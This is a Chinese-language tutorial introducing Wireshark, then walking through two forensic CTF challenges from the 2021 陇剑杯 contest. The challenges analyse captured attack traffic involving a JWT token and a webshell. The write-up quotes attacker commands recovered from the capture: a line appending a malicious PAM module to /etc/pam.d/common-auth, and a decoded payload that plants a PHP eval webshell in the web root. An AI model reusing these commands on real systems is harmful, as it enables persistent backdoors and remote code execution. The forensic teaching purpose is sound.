Wireshark简介
抓包前
1.打开wireshark得到下面的界面
2.选择菜单栏上捕获-> 选项,勾选WLAN网卡(这里需要根据各自电脑网卡使用情况选择,简单的办法可以看使用的IP对应的网卡)。点击开始。启动抓包。
3.wireshark启动后,wireshark处于抓包状态中。
抓包后
简单介绍一下打开一个文件后的界面
在数据列表区的颜色不同,有不同的意义,如下:
其中的主要区域:
1.应用显示过滤器, 用于设置过滤条件进行数据包列表过滤。菜单路径:分析--> 显示过滤器。
2.数据包列表, 显示捕获到的数据包,每个数据包包含编号,时间戳,源地址,目标地址,协议,长度,以及数据包信息。 不同协议的数据包使用了不同的颜色区分显示。
刷题实操
[陇剑杯 2021]jwt
[陇剑杯 2021]jwt(问1)
其实从题目我们就知道答案了。
但是我们还是得学会怎么做,用wireshark打开,
结合题目描述,"认证方式",我们就去搜索一下认证方式
对比三种认证方式:传统token认证,jwt认证,oauth认证_token认证原理-CSDN博客
看到了题目的jwt,其中有header,而wireshark的流量分析也有head,查看一下,有token
然后,我们追踪一下,这一段token是什么
其中成分挺多的,有大写、小写、数字、下划线......那么我们先试试base64
这样解码可以看到一个经典的用户名'admin',所以这应该就包含了我们的flag
[陇剑杯 2021]jwt(问2)
在前文的那篇文章中我们可以得到如下知识:
也就是说id和name都包含到了token里面,所以我们搜索字符串token 
看到whoami,这里我们就已经能感知到自己成功了,继续base64解码
[陇剑杯 2021]jwt(问3)
需要的是权限是什么。我搜索刚才的whoami,然后这一条流量的下一条应该就是它的回复了,所以我们就看看下一条流量,得到回复是root,所以权限是root
[陇剑杯 2021]jwt(问4)
题目描述是文件上传,所以我们过滤
http.request.method=="POST"
挨个查看信息,看到了一个类似文件的
[陇剑杯 2021]jwt(问5)
和上一题类似,再过滤一个字符串so
[陇剑杯 2021]jwt(问6)
因为给的是黑客攻击流量,所有http的请求方法应该为"POST"
Etc是Linux系统下的一个文件夹,一般用来寄存程序所需的整个文件系统的配置文件
根据echo "auth optional looter.so">>/etc/pam.d/common-auth可知其意为:向/etc/pam.d/common-auth文件追加一行内容,内容为auth optional looter.so,故文件路径为/etc/pam.d/common-auth
[陇剑杯 2021]webshell
[陇剑杯 2021]webshell(问1)
需要的是密码,所以输入pass找找
[陇剑杯 2021]webshell(问2)
因为修改的是日志文件,所以后缀通常是.log,那么就搜索这个字符串
直接提交显示错误,再看一下题目,说的是绝对路径,就得从根目录开始,那么我们就需要再找一下该路径的工作目录的路径
这里我们需要来学习一下aaa这个传参,这句话进行base64解码后得到的是:
"aaa"="system('echo <?php eval($_REQUEST[aaa]);?>|=base64 -d > /var/www/html/1.php');
这个代码将会实现在目标服务器上植入PHP webshell,从这里我们可以看到植入的文件是1.php,所以这个文件和我们的日志文件是同一级的,所以我们就找到了需要的根目录。
[陇剑杯 2021]webshell(问3)
黑客获取webshell后,大概率会执行id或者whoami命令来查看自己的权限,那么就搜索字符串whoami去获得,得到了两条流量,我们就分别追踪
第一条的状态码是404,就不用看了
第二条的状态码是200
那么就继续往下审(也可以选择直接搜索use,因为User Group就是用户权限的意思,也就是对whoami的回答了)
